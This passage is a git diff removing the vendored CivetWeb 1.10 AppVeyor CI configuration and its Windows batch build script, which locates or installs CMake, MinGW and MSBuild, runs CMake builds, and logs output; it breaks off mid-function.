-  # See http://help.appveyor.com/discussions/problems/3193-cmake-building-for-mingw-issue-with-git-shexe

-  # The entire directory containing sh.exe could be removed from the PATH environment:

-  # - set PATH=%PATH:C:\Program Files\Git\usr\bin;=%

-  # However, this will also remove all other programs in this directory from the PATH.

-  # In particular "patch" is still required.

-  # So, just rename sh.exe:

-  - ren "C:\Program Files\Git\usr\bin\sh.exe" _sh.exe

-  # Set up mingw commands

-  - if "%compiler_name%"=="gcc" (set "generator=MinGW Makefiles")

-  - if "%compiler_name%"=="gcc" (set "build=mingw32-make -j4")

-  - if "%compiler_name%"=="gcc" (set "test=mingw32-make test")

-  # MSVC specific commands

-  # Note: The minimum version officially supported for CivetWeb is VS2010. Older ones might work or not.

-  - if "%compiler_version%"=="14" (set "vs_version=8" & set "vs_year=2005")

-  - if "%compiler_version%"=="15" (set "vs_version=9" & set "vs_year=2008")

-  - if "%compiler_version%"=="16" (set "vs_version=10" & set "vs_year=2010")

-  - if "%compiler_version%"=="17" (set "vs_version=11" & set "vs_year=2012")

-  - if "%compiler_version%"=="18" (set "vs_version=12" & set "vs_year=2013")

-  - if "%compiler_version%"=="19" (set "vs_version=14" & set "vs_year=2015")

-  - if "%compiler_version%"=="20" (set "vs_version=15" & set "vs_year=2017")

-  - if "%compiler_name%"=="msvc" (set "generator=Visual Studio %vs_version% %vs_year%")

-  - if "%compiler_name%"=="msvc" (

-      if "%platform%"=="x64" (

-        set "generator=%generator% Win64"

-      )

-    )

-  - if %compiler_version% gtr 9 (set platform=%platform:x86=Win32%)

-  - if "%compiler_name%"=="msvc" (set "msbuild_opts=/clp:OnlyErrors;OnlyWarnings /nologo /m /v:m")

-  - if "%compiler_name%"=="msvc" (set "build=msbuild %msbuild_opts% /p:Configuration=%configuration% /p:Platform=%platform% civetweb.sln")

-  - if "%compiler_name%"=="msvc" (set "test=msbuild %msbuild_opts% RUN_TESTS.vcxproj")

-  # Add the compiler path if needed

-  - if not "%compiler_path%"=="" (set "PATH=%PATH%;%compiler_path%")

-  # git bash conflicts with MinGW makefiles

-  - if "%generator%"=="MinGW Makefiles" (set "PATH=%PATH:C:\Program Files (x86)\Git\bin=%")

-  # Useful locations

-  - set "source_path=%cd%"

-  - set "output_path=%source_path%\output"

-  - set "build_path=%output_path%\build"

-  - set "install_path=%output_path%\install"

-  - set "third_party_dir=C:\third-party"

-  # Check some settings of the build server

-  - ver

-  - cd

-  - dir

-  - ipconfig /all

-  # Generate the build scripts with CMake

-  - mkdir "%build_path%"

-  - cd "%build_path%"

-  - cmake --version

-  - appveyor AddMessage -Category Information "Generating '%generator%'"

-  - cmake

-    -G "%generator%"

-    -DCMAKE_BUILD_TYPE=%build_type%

-    -DBUILD_SHARED_LIBS=%build_shared%

-    -DCIVETWEB_SERVE_NO_FILES=%no_files%

-    "-DCIVETWEB_THIRD_PARTY_DIR=%third_party_dir:\=\\%"

-    -DCIVETWEB_ENABLE_THIRD_PARTY_OUTPUT=YES

-    -DCIVETWEB_ENABLE_SSL=%enable_ssl%

-    -DCIVETWEB_DISABLE_CGI=%no_cgi%

-    -DCIVETWEB_ENABLE_SSL_DYNAMIC_LOADING=%enable_ssl_dynamic_loading%

-    -DCIVETWEB_ENABLE_WEBSOCKETS=%enable_websockets%

-    -DCIVETWEB_ENABLE_CXX=%enable_cxx%

-    -DCIVETWEB_ENABLE_LUA=%enable_lua%

-    -DCIVETWEB_ENABLE_LUA_SHARED=%enable_lua_shared%

-    -DCIVETWEB_DISABLE_CACHING=%no_caching%

-    -DCIVETWEB_C_STANDARD=%c_standard%

-    -DCIVETWEB_CXX_STANDARD=%cxx_standard%

-    "%source_path%"

-  - powershell Push-AppveyorArtifact CMakeCache.txt

-  - cd "%source_path%"

-

-build_script:

-  - cd

-  - cd "%build_path%"

-  - appveyor AddMessage -Category Information "Build command '%build%'"

-  - cmd /c "%build%"

-  - cd "%source_path%"

-

-test_script:

-  - cd "%build_path%"

-  - appveyor AddMessage -Category Information "Test command '%build%'"

-  - set CTEST_OUTPUT_ON_FAILURE=1

-  - cmd /c "%test%"

-  - cd "%source_path%"

-

-  - set "output_path=%source_path%\output"

-  - set "build_path=%output_path%\build"

-  - set "install_path=%output_path%\install"

-  - set "third_party_dir=C:\third-party"

-

-after_test:

-  - echo "Current directory:"

-  - cd

-  - dir

-  - md dist

-  - if "%build_type%"=="Release" (cmake "-DCMAKE_INSTALL_PREFIX=%install_path%" -P "%build_path%/cmake_install.cmake")

-  - dir dist\

-  - echo "Output directory:"

-  - dir %output_path%

-  - echo "Build directory:"

-  - dir %build_path%

-  - if "%build_type%"=="Release" (echo "Install directory:")

-  - if "%build_type%"=="Release" (dir %install_path%)

-  - if "%build_type%"=="Release" (dir %install_path%\bin)

-  - if "%build_type%"=="Release" (dir %install_path%\include)

-  - if "%build_type%"=="Release" (dir %install_path%\lib)

-  - if "%build_type%"=="Release" (copy "%install_path%"\include dist\)

-  - if "%build_type%"=="Release" (copy "%install_path%"\bin\*.exe dist\)

-  - echo "Dist directory:"

-  - dir dist\

-

-matrix:

-  fast_finish: false

-

-cache:

-  - C:\mingw-builds -> mingw.cmd

-  - C:\third-party -> **\CMakeLists.txt

-  - C:\ssl

-

-artifacts:

-  - path: dist\*

-

diff --git a/thirdparty/civetweb-1.10/build.cmd b/thirdparty/civetweb-1.10/build.cmd
deleted file mode 100644
index 8ccf0e4..0000000
--- a/thirdparty/civetweb-1.10/build.cmd
+++ /dev/null
@@ -1,866 +0,0 @@
-:: Make sure the extensions are enabled
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :print_usage "Failed to enable extensions"
-  exit /b 1
-)
-
-::Change the code page to unicode
-@chcp 65001 1>nul 2>nul
-@if errorlevel 1 (
-  call :print_usage "Failed to change the code page to unicode"
-  exit /b 1
-)
-
-:: Set up some global variables
-@set project=civetweb
-@set "script_name=%~nx0"
-@set "script_folder=%~dp0"
-@set "script_folder=%script_folder:~0,-1%"
-@set "output_path=%script_folder%\output"
-@set "build_path=%output_path%\build"
-@set "install_path=%output_path%\install"
-@set build_shared=OFF
-@set build_type=Release
-@set dependency_path=%TEMP%\%project%-build-dependencies
-
-:: Check the command line parameters
-@set logging_level=1
-@set "options=%* "
-@if not "!options!"=="!options:/? =!" set usage="Convenience script to build %project% with CMake"
-@for %%a in (%options%) do @(
-  @set arg=%%~a
-  @set arg=!arg: =!
-  @set one=!arg:~0,1!
-  @set two=!arg:~0,2!
-  @if /i [!arg!] == [/q] set quiet=true
-  @if /i [!two!] == [/v] call :verbosity "!arg!"
-  @if /i [!arg!] == [/s] set build_shared=ON
-  @if /i [!arg!] == [/d] set build_type=Debug
-  @if /i not [!one!] == [/] (
-    if not defined generator (
-      set generator=!arg!
-    ) else (
-      set usage="Too many generators: !method! !arg!" ^
-                "There should only be one generator parameter"
-    )
-  )
-)
-@if defined quiet (
-  set logging_level=0
-)
-@if not defined generator (
-  set generator=MSVC
-)
-@if /i not [%generator%] == [MinGW] (
-  if /i not [%generator%] == [MSVC] (
-    call :print_usage "Invalid argument: %generator%"
-    exit /b 1
-  )
-)
-
-:: Set up the logging
-@set log_folder=%output_path%\logs
-@call :iso8601 timestamp
-@set log_path=%log_folder%\%timestamp%.log
-@set log_keep=10
-
-:: Only keep a certain amount of logs
-@set /a "log_keep=log_keep-1"
-@if not exist %log_folder% @mkdir %log_folder%
-@for /f "skip=%log_keep%" %%f in ('dir /b /o-D /tc %log_folder%') do @(
-  call :log 4 "Removing old log file %log_folder%\%%f"
-  del %log_folder%\%%f
-)
-
-:: Set up some more global variables
-@call :architecture arch
-@call :windows_version win_ver win_ver_major win_ver_minor win_ver_rev
-@call :script_source script_source
-@if [%script_source%] == [explorer] (
-  set /a "logging_level=logging_level+1"
-)
-
-:: Print the usage or start the script
-@set exit_code=0
-@if defined usage (
-  call :print_usage %usage%
-) else (
-  call :main
-  @if errorlevel 1 (
-    @call :log 0 "Failed to build the %project% project"
-    @set exit_code=1
-  )
-)
-
-:: Tell the user where the built files are
-@call :log 5
-@call :log 0 "The built files are available in %install_path%"
-
-:: Stop the script if the user double clicked
-@if [%script_source%] == [explorer] (
-  pause
-)
-
-@exit /b %exit_code%
-@endlocal
-@goto :eof
-
-:: -------------------------- Functions start here ----------------------------
-
-:main - Main function that performs the build
-@setlocal
-@call :log 6
-@call :log 2 "Welcome to the %project% build script"
-@call :log 6 "------------------------------------"
-@call :log 6
-@call :log 2 "This script builds the project using CMake"
-@call :log 6
-@call :log 2 "Generating %generator%..."
-@call :log 6
-@set methods=dependencies ^
-             generate ^
-             build ^
-             install
-@for %%m in (%methods%) do @(
-  call :log 3 "Excuting the '%%m' method"
-  call :log 8
-  call :%%~m
-  if errorlevel 1 (
-    call :log 0 "Failed to complete the '%%~m' dependency routine"
-    call :log 0 "View the log at %log_path%"
-    exit /b 1
-  )
-)
-@call :log 6 "------------------------------------"
-@call :log 2 "Build complete"
-@call :log 6
-@endlocal
-@goto :eof
-
-:print_usage - Prints the usage of the script
-:: %* - message to print, each argument on it's own line
-@setlocal
-@for %%a in (%*) do @echo.%%~a
-@echo.
-@echo.build [/?][/v[v...]^|/q][MinGW^|MSVC]
-@echo.
-@echo.  [MinGW^|(MSVC)]
-@echo.              Builds the library with one of the compilers
-@echo.  /s          Builds shared libraries
-@echo.  /d          Builds a debug variant of the project
-@echo.  /v          Sets the output to be more verbose
-@echo.  /v[v...]    Extra verbosity, /vv, /vvv, etc
-@echo.  /q          Quiets the output
-@echo.  /?          Shows this usage message
-@echo.
-@endlocal
-@goto :eof
-
-:dependencies - Installs any prerequisites for the build
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :log 0 "Failed to enable extensions"
-  exit /b 1
-)
-@call :log 5
-@call :log 0 "Installing dependencies for %generator%"
-@if /i [%generator%] == [MinGW] (
-  call :mingw compiler_path
-  @if errorlevel 1 (
-    @call :log 5
-    @call :log 0 "Failed to find MinGW"
-    @exit /b 1
-  )
-  set "PATH=!compiler_path!;%PATH%"
-  @call :find_in_path gcc_executable gcc.exe
-  @if errorlevel 1 (
-    @call :log 5
-    @call :log 0 "Failed to find gcc.exe"
-    @exit /b 1
-  )
-)
-@if [%reboot_required%] equ [1] call :reboot
-@endlocal & set "PATH=%PATH%"
-@goto :eof
-
-:generate - Uses CMake to generate the build files
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :log 0 "Failed to enable extensions"
-  exit /b 1
-)
-@call :log 5
-@call :log 0 "Generating CMake files for %generator%"
-@call :cmake cmake_executable
-@if errorlevel 1 (
-  @call :log 5
-  @call :log 0 "Need CMake to create the build files"
-  @exit /b 1
-)
-@if /i [%generator%] == [MinGW] @(
-  @set "generator_var=-G "MinGW Makefiles^""
-)
-@if /i [%generator%] == [MSVC] @(
-  rem We could figure out the correct MSVS generator here
-)
-@call :iso8601 iso8601
-@set output=%temp%\cmake-%iso8601%.log
-@if not exist %build_path% mkdir %build_path%
-@cd %build_path%
-@"%cmake_executable%" ^
-  !generator_var! ^
-  -DCMAKE_BUILD_TYPE=!build_type! ^
-  -DBUILD_SHARED_LIBS=!build_shared! ^
-  "%script_folder%" > "%output%"
-@if errorlevel 1 (
-  @call :log 5
-  @call :log 0 "Failed to generate build files with CMake"
-  @call :log_append "%output%"
-  @cd %script_folder%
-  @exit /b 1
-)
-@cd %script_folder%
-@endlocal
-@goto :eof
-
-:build - Builds the library
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :log 0 "Failed to enable extensions"
-  exit /b 1
-)
-@call :log 5
-@call :log 0 "Building %project% with %generator%"
-@if /i [%generator%] == [MinGW] @(
-  @call :find_in_path mingw32_make_executable mingw32-make.exe
-  @if errorlevel 1 (
-    @call :log 5
-    @call :log 0 "Failed to find mingw32-make"
-    @exit /b 1
-  )
-  @set "build_command=^"!mingw32_make_executable!^" all test"
-)
-@if /i [%generator%] == [MSVC] @(
-  @call :msbuild msbuild_executable
-  @if errorlevel 1 (
-    @call :log 5
-    @call :log 0 "Failed to find MSBuild"
-    @exit /b 1
-  )
-  @set "build_command=^"!msbuild_executable!^" /m:4 /p:Configuration=%build_type% %project%.sln"
-)
-@if not defined build_command (
-  @call :log 5
-  @call :log 0 "No build command for %generator%"
-  @exit /b 1
-)
-@cd %build_path%
-@call :iso8601 iso8601
-@set output=%temp%\build-%iso8601%.log
-@call :log 7
-@call :log 2 "Build command: %build_command:"=%"
-@%build_command% > "%output%"
-@if errorlevel 1 (
-  @call :log_append "%output%"
-  @call :log 5
-  @call :log 0 "Failed to complete the build"
-  @exit /b 1
-)
-@call :log_append "%output%"
-@cd %script_folder%
-@endlocal
-@goto :eof
-
-:install - Installs the built files
-@setlocal
-@call :log 5
-@call :log 0 "Installing built files"
-@call :cmake cmake_executable
-@if errorlevel 1 (
-  @call :log 5
-  @call :log 0 "Need CMake to install the built files"
-  @exit /b 1
-)
-@call :iso8601 iso8601
-@set output=%temp%\install-%iso8601%.log
-@"%cmake_executable%" ^
-  "-DCMAKE_INSTALL_PREFIX=%install_path%" ^
-  -P "%build_path%/cmake_install.cmake" ^
-  > "%output%"
-@if errorlevel 1 (
-  @call :log_append "%output%"
-  @call :log 5
-  @call :log 0 "Failed to install the files"
-  @exit /b 1
-)
-@call :log_append "%output%"
-@endlocal
-@goto :eof
-
-:script_source - Determines if the script was ran from the cli or explorer
-:: %1 - The return variable [cli|explorer]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :log 0 "Failed to enable extensions"
-  exit /b 1
-)
-@call :log 3 "Attempting to detect the script source"
-@echo "The invocation command was: '%cmdcmdline%'" >> %log_path%
-@for /f "tokens=1-3,*" %%a in ("%cmdcmdline%") do @(
-  set cmd=%%~a
-  set arg1=%%~b
-  set arg2=%%~c
-  set rest=%%~d
-)
-@set quote="
-@if "!arg2:~0,1!" equ "!quote!" (
-  if "!arg2:~-1!" neq "!quote!" (
-    set "arg2=!arg2:~1!"
-  )
-)
-@call :log 4 "cmd  = %cmd%"
-@call :log 4 "arg1 = %arg1%"
-@call :log 4 "arg2 = %arg2%"
-@call :log 4 "rest = %rest%"
-@call :log 4 "src  = %~f0"
-@if /i "%arg2%" == "call" (
-  set script_source=cli
-) else (
-  @if /i "%arg1%" == "/c" (
-    set script_source=explorer
-  ) else (
-    set script_source=cli
-  )
-)
-@call :log 3 "The script was invoked from %script_source%"
-@endlocal & set "%~1=%script_source%"
-@goto :eof
-
-:architecture - Finds the system architecture
-:: %1 - The return variable [x86|x86_64]
-@setlocal
-@call :log 3 "Determining the processor architecture"
-@set "key=HKLM\System\CurrentControlSet\Control\Session Manager\Environment"
-@set "var=PROCESSOR_ARCHITECTURE"
-@for /f "skip=2 tokens=2,*" %%a in ('reg query "%key%" /v "%var%"') do @set "arch=%%b"
-@if "%arch%" == "AMD64" set arch=x86_64
-@call :log 4 "arch = %arch%"
-@endlocal & set "%~1=%arch%"
-@goto :eof
-
-:md5 - Gets the MD5 checksum for a file
-:: %1 - The hash
-:: %2 - The file path
-@setlocal
-@set var=%~1
-@set file_path=%~2
-@if [%var%] == [] exit /b 1
-@if "%file_path%" == "" exit /b 1
-@if not exist "%file_path%" exit /b 1
-@for /f "skip=3 tokens=1,*" %%a in ('powershell Get-FileHash -Algorithm MD5 "'%file_path%'"') do @set hash=%%b
-@if not defined hash (
-  call :log 6
-  call :log 0 "Failed to get MD5 hash for %file_path%"
-  exit /b 1
-)
-@endlocal & set "%var%=%hash: =%"
-@goto :eof
-
-:windows_version - Checks the windows version
-:: %1 - The windows version
-:: %2 - The major version number return variable
-:: %3 - The minor version number return variable
-:: %4 - The revision version number return variable
-@setlocal
-@call :log 3 "Retrieving the Windows version"
-@for /f "tokens=2 delims=[]" %%x in ('ver') do @set win_ver=%%x
-@set win_ver=%win_ver:Version =%
-@set win_ver_major=%win_ver:~0,1%
-@set win_ver_minor=%win_ver:~2,1%
-@set win_ver_rev=%win_ver:~4%
-@call :log 4 "win_ver = %win_ver%"
-@endlocal & set "%~1=%win_ver%" ^
-          & set "%~2=%win_ver_major%" ^
-          & set "%~3=%win_ver_minor%" ^
-          & set "%~4=%win_ver_rev%"
-@goto :eof
-
-:find_in_path - Finds a program of file in the PATH
-@setlocal
-@set var=%~1
-@set file=%~2
-@if [%var%] == [] exit /b 1
-@if [%file%] == [] exit /b 1
-@call :log 3 "Searching PATH for %file%"
-@for %%x in ("%file%") do @set "file_path=%%~f$PATH:x"
-@if not defined file_path exit /b 1
-@endlocal & set "%var%=%file_path%"
-@goto :eof
-
-:administrator_check - Checks for administrator priviledges
-@setlocal
-@call :log 2 "Checking for administrator priviledges"
-@set "key=HKLM\Software\VCA\Tool Chain\Admin Check"
-@reg add "%key%" /v Elevated /t REG_DWORD /d 1 /f > nul 2>&1
-@if errorlevel 1 exit /b 1
-@reg delete "%key%" /va /f > nul 2>&1
-@endlocal
-@goto :eof
-
-:log_append - Appends another file into the current logging file
-:: %1 - the file_path to the file to concatenate
-@setlocal
-@set "file_path=%~1"
-@if [%file_path%] == [] exit /b 1
-@call :log 3 "Appending to log: %file_path%"
-@call :iso8601 iso8601
-@set "temp_log=%temp%\append-%iso8601%.log"
-@call :log 4 "Using temp file %temp_log%"
-@type "%log_path%" "%file_path%" > "%temp_log%" 2>nul
-@move /y "%temp_log%" "%log_path%" 1>nul
-@del "%file_path%" 2>nul
-@del "%temp_log%" 2>nul
-@endlocal
-@goto :eof
-
-:iso8601 - Returns the current time in ISO8601 format
-:: %1 - the return variable
-:: %2 - format [extended|basic*]
-:: iso8601 - contains the resulting timestamp
-@setlocal
-@wmic Alias /? >NUL 2>&1 || @exit /b 1
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "format=%~2"
-@if "%format%" == "" set format=basic
-@for /F "skip=1 tokens=1-6" %%g IN ('wmic Path Win32_UTCTime Get Day^,Hour^,Minute^,Month^,Second^,Year /Format:table') do @(
-  @if "%%~l"=="" goto :iso8601_done
-  @set "yyyy=%%l"
-  @set "mm=00%%j"
-  @set "dd=00%%g"
-  @set "hour=00%%h"
-  @set "minute=00%%i"
-  @set "seconds=00%%k"
-)
-:iso8601_done
-@set mm=%mm:~-2%
-@set dd=%dd:~-2%
-@set hour=%hour:~-2%
-@set minute=%minute:~-2%
-@set seconds=%seconds:~-2%
-@if /i [%format%] == [extended] (
-  set iso8601=%yyyy%-%mm%-%dd%T%hour%:%minute%:%seconds%Z
-) else (
-  if /i [%format%] == [basic] (
-    set iso8601=%yyyy%%mm%%dd%T%hour%%minute%%seconds%Z
-  ) else (
-    @exit /b 1
-  )
-)
-@set iso8601=%iso8601: =0%
-@endlocal & set %var%=%iso8601%
-@goto :eof
-
-:verbosity - Processes the verbosity parameter '/v[v...]
-:: %1 - verbosity given on the command line
-:: logging_level - set to the number of v's
-@setlocal
-@set logging_level=0
-@set verbosity=%~1
-:verbosity_loop
-@set verbosity=%verbosity:~1%
-@if not [%verbosity%] == [] @(
-  set /a "logging_level=logging_level+1"
-  goto verbosity_loop
-)
-@endlocal & set logging_level=%logging_level%
-@goto :eof
-
-:log - Logs a message, depending on verbosity
-:: %1 - level
-::       [0-4] for CLI logging
-::       [5-9] for GUI logging
-:: %2 - message to print
-@setlocal
-@set "level=%~1"
-@set "msg=%~2"
-@if "%log_folder%" == "" (
-  echo Logging was used to early in the script, log_folder isn't set yet
-  goto :eof
-)
-@if "%log_path%" == "" (
-  echo Logging was used to early in the script, log_path isn't set yet
-  goto :eof
-)
-@if not exist "%log_folder%" mkdir "%log_folder%"
-@if not exist "%log_path%" echo. 1>nul 2>"%log_path%"
-@echo.%msg% >> "%log_path%"
-@if %level% geq 5 (
-  @if [%script_source%] == [explorer] (
-    set /a "level=level-5"
-  ) else (
-    @goto :eof
-  )
-)
-@if "%logging_level%" == "" (
-  echo Logging was used to early in the script, logging_level isn't set yet
-  goto :eof
-)
-@if %logging_level% geq %level% echo.%msg% 1>&2
-@endlocal
-@goto :eof
-
-
-:start_browser - Opens the default browser to a URL
-:: %1 - the url to open
-@setlocal
-@set url=%~1
-@call :log 4 "Opening default browser: %url%"
-@start %url%
-@endlocal
-@goto :eof
-
-:find_cmake - Finds cmake on the command line or in the registry
-:: %1 - the cmake file path
-@setlocal
-@set var=%~1
-@if [%var%] == [] exit /b 1
-@call :log 6
-@call :log 6 "Finding CMake"
-@call :log 6 "--------------"
-@call :find_in_path cmake_executable cmake.exe
-@if not errorlevel 1 goto found_cmake
-@for /l %%i in (5,-1,0) do @(
-@for /l %%j in (9,-1,0) do @(
-@for /l %%k in (9,-1,0) do @(
-@for %%l in (HKCU HKLM) do @(
-@for %%m in (SOFTWARE SOFTWARE\Wow6432Node) do @(
-  @reg query "%%l\%%m\Kitware\CMake %%i.%%j.%%k" /ve > nul 2>nul
-  @if not errorlevel 1 (
-    @for /f "skip=2 tokens=2,*" %%a in ('reg query "%%l\%%m\Kitware\CMake %%i.%%j.%%k" /ve') do @(
-      @if exist "%%b\bin\cmake.exe" (
-        @set "cmake_executable=%%b\bin\cmake.exe"
-        goto found_cmake
-      )
-    )
-  )
-)))))
-@call :log 5
-@call :log 0 "Failed to find cmake"
-@exit /b 1
-:found_cmake
-@endlocal & set "%var%=%cmake_executable%"
-@goto :eof
-
-:cmake - Finds cmake and installs it if necessary
-:: %1 - the cmake file path
-@setlocal
-@set var=%~1
-@if [%var%] == [] exit /b 1
-@call :log 6
-@call :log 6 "Checking for CMake"
-@call :log 6 "------------------"
-@call :find_cmake cmake_executable cmake.exe
-@if not errorlevel 1 goto got_cmake
-@set checksum=C00267A3D3D9619A7A2E8FA4F46D7698
-@set version=3.2.2
-@call :install_nsis cmake http://www.cmake.org/files/v%version:~0,3%/cmake-%version%-win32-x86.exe %checksum%
-@if errorlevel 1 (
-  call :log 5
-  call :log 0 "Failed to install cmake"
-  @exit /b 1
-)
-@call :find_cmake cmake_executable cmake.exe
-@if not errorlevel 1 goto got_cmake
-@call :log 5
-@call :log 0 "Failed to check for cmake"
-@exit /b 1
-:got_cmake
-@endlocal & set "%var%=%cmake_executable%"
-@goto :eof
-
-:mingw - Finds MinGW, installing it if needed
-:: %1 - the compiler path that should be added to PATH
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 5
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set var=%~1
-@if [%var%] == [] exit /b 1
-@call :log 6
-@call :log 6 "Checking for MinGW"
-@call :log 6 "------------------"
-@call :find_in_path gcc_executable gcc.exe
-@if not errorlevel 1 (
-  @for %%a in ("%gcc_executable%") do @set "compiler_path=%%~dpa"
-  goto got_mingw
-)
-@call :log 7
-@call :log 2 "Downloading MinGW"
-@if %logging_level% leq 1 set "logging=/q"
-@if %logging_level% gtr 1 set "logging=/v"
-@set output_path=
-@for /f %%a in ('call
-    "%script_folder%\mingw.cmd"
-    %logging%
-    /arch "%arch%"
-    "%dependency_path%"'
-) do @set "compiler_path=%%a\"
-@if not defined compiler_path (
-  @call :log_append "%output%"
-  @call :log 5
-  @call :log 0 "Failed to download MinGW"
-  @exit /b 1
-)
-:got_mingw
-@call :log 5
-@call :log 0 "Found MinGW: %compiler_path%gcc.exe"
-@endlocal & set "%var%=%compiler_path%"
-@goto :eof
-
-:msbuild - Finds MSBuild
-:: %1 - the path to MSBuild executable
-@setlocal
-@set var=%~1
-@if [%var%] == [] exit /b 1
-@call :find_in_path msbuild_executable msbuild.exe
-@if not errorlevel 1 goto got_msbuild
-@for /l %%i in (20,-1,4) do @(
-@for /l %%j in (9,-1,0) do @(
-@for %%k in (HKCU HKLM) do @(
-@for %%l in (SOFTWARE SOFTWARE\Wow6432Node) do @(
-  @reg query "%%k\%%l\Microsoft\MSBuild\%%i.%%j" /v MSBuildOverrideTasksPath > nul 2>nul
-  @if not errorlevel 1 (
-    @for /f "skip=2 tokens=2,*" %%a in ('reg query "%%k\%%l\Microsoft\MSBuild\%%i.%%j" /v MSBuildOverrideTasksPath') do @(
-      @if exist "%%bmsbuild.exe" (
-        @set "msbuild_executable=%%bmsbuild.exe"
-        goto got_msbuild
-      )
-    )
-  )
-))))
-@call :log 5
-@call :log 0 "Failed to check for MSBuild"
-@exit /b 1
-:got_msbuild
-@endlocal & set "%var%=%msbuild_executable%"
-@goto :eof
-
-:download - Downloads a file from the internet
-:: %1 - the url of the file to download
-:: %2 - the file to download to
-:: %3 - the MD5 checksum of the file (optional)
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  call :print_usage "Failed to enable extensions"
-  exit /b 1
-)
-@set url=%~1
-@set file_path=%~2
-@set checksum=%~3
-@for %%a in (%file_path%) do @set dir_path=%%~dpa
-@for %%a in (%file_path%) do @set file_name=%%~nxa
-@if [%url%] == [] exit /b 1
-@if [%file_path%] == [] exit /b 1
-@if [%dir_path%] == [] exit /b 1
-@if [%file_name%] == [] exit /b 1
-@if not exist "%dir_path%" mkdir "%dir_path%"
-@call :log 1 "Downloading %url%"
-@call :iso8601 iso8601
-@set temp_path=%temp%\download-%iso8601%-%file_name%
-@call :log 3 "Using temp file %temp_path%"
-@powershell Invoke-WebRequest "%url%" -OutFile %temp_path%
-@if errorlevel 1 (
-  call :log 0 "Failed to download %url%"
-  exit /b 1
-)
-@if [%checksum%] neq [] (
-  @call :log 4 "Checking %checksum% against %temp_path%"
-  @call :md5 hash "%temp_path%"
-  if "!hash!" neq "%checksum%" (
-    call :log 0 "Failed to match checksum: %temp_path%"
-    call :log 0 "Hash    : !hash!"
-    call :log 0 "Checksum: %checksum%"
-    exit /b 1
-  ) else (
-    call :log 3 "Checksum matched: %temp_path%"
-    call :log 3 "Hash    : !hash!"
-    call :log 3 "Checksum: %checksum%"
-  )
-)
-@call :log 4 "Renaming %temp_path% to %file_path%"
-@move /y "%temp_path%" "%file_path%" 1>nul
-@endlocal
-@goto :eof
-
-:install_msi - Installs a dependency from an Microsoft Installer package (.msi)
-:: %1 - [string] name of the project to install
-:: %2 - The location of the .msi, a url must start with 'http://' or file_path
-:: %3 - The checksum of the msi (optional)
-@setlocal
-@set name=%~1
-@set file_path=%~2
-@set checksum=%~3
-@set msi=%~nx2
-@set msi_path=%dependency_path%\%msi%
-@if [%name%] == [] exit /b 1
-@if [%file_path%] == [] exit /b 1
-@if [%msi%] == [] exit /b 1
-@if [%msi_path%] == [] exit /b 1
-@for %%x in (msiexec.exe) do @set "msiexec_path=%%~f$PATH:x"
-@if "msiexec_path" == "" (
-  call :log 0 "Failed to find the Microsoft package installer (msiexec.exe)"
-  call :log 6
-  call :log 0 "Please install it from the Microsoft Download center"
-  call :log 6
-  choice /C YN /T 60 /D N /M "Would you like to go there now?"
-  if !errorlevel! equ 1 call :start_browser ^
-    "http://search.microsoft.com/DownloadResults.aspx?q=Windows+Installer"
-  exit /b 1
-)
-@call :log 6
-@call :log 1 "Installing the '%name%' dependency"
-@call :log 6 "-------------------------------------"
-@call :administrator_check
-@if errorlevel 1 (
-  call :log 0 "You must run %~nx0 in elevated mode to install '%name%'"
-  call :log 5 "Right-Click and select 'Run as Administrator'
-  call :log 0 "Install the dependency manually by running %file_path%"
-  @exit /b 740
-)
-@if [%file_path:~0,4%] == [http] (
-  if not exist "%msi_path%" (
-    call :download "%file_path%" "%msi_path%" %checksum%
-    if errorlevel 1 (
-      call :log 0 "Failed to download the %name% dependency"
-      exit /b 1
-    )
-  )
-) else (
-  call :log 2 "Copying MSI %file_path% to %msi_path%"
-  call :log 7
-  if not exist "%msi_path%" (
-    xcopy /q /y /z "%file_path%" "%msi_path%" 1>nul
-    if errorlevel 1 (
-      call :log 0 "Failed to copy the Microsoft Installer"
-      exit /b 1
-    )
-  )
-)
-@call :log 1 "Running the %msi%"
-@call :log 6
-@set msi_log=%temp%\msiexec-%timestamp%.log
-@call :log 3 "Logging to: %msi_log%"
-@msiexec /i "%msi_path%" /passive /log "%msi_log%" ALLUSERS=1
-@set msi_errorlevel=%errorlevel%
-@call :log_append "%msi_log%"
-@if %msi_errorlevel% equ 0 goto install_msi_success
-@if %msi_errorlevel% equ 3010 goto install_msi_success_reboot
-@if %msi_errorlevel% equ 1641 goto install_msi_success_reboot
-@if %msi_errorlevel% equ 3015 goto install_msi_in_progress_reboot
-@if %msi_errorlevel% equ 1615 goto install_msi_in_progress_reboot
-@call :log 0 "Microsoft Installer failed: %msi_errorlevel%"
-@call :log 0 "Install the dependency manually by running %msi_path%"
-@exit /b 1
-:install_msi_in_progress_reboot
-@call :log 0 "The installation requires a reboot to continue"
-@call :log 5
-@call :reboot
-@exit /b 1
-:install_msi_success_reboot
-@call :log 3 "The installation requires a reboot to be fully functional"
-@set reboot_required=1
-:install_msi_success
-@call :log 2 "Successfully installed %name%"
-@call :log 7
-@endlocal & set reboot_required=%reboot_required%
-@goto :eof
-
-:install_nsis - Installs a dependency from an Nullsoft Installer package (.exe)
-:: %1 - [string] name of the project to install
-:: %2 - The location of the .exe, a url must start with 'http://' or file_path
-:: %3 - The checksum of the exe (optional)
-@setlocal
-@set name=%~1
-@set file_path=%~2
-@set checksum=%~3
-@set exe=%~nx2
-@set exe_path=%dependency_path%\%exe%
-@if [%name%] == [] exit /b 1
-@if [%file_path%] == [] exit /b 1
-@if [%exe%] == [] exit /b 1
-@if [%exe_path%] == [] exit /b 1
-@call :log 6
-@call :log 1 "Installing the '%name%' dependency"
-@call :log 6 "-------------------------------------"
-@call :administrator_check
-@if errorlevel 1 (
-  call :log 0 "You must run %~nx0 in elevated mode to install '%name%'"
-  call :log 5 "Right-Click and select 'Run as Administrator'
-  call :log 0 "Install the dependency manually by running %file_path%"
-  @exit /b 740
-)
-@if [%file_path:~0,4%] == [http] (
-  if not exist "%exe_path%" (
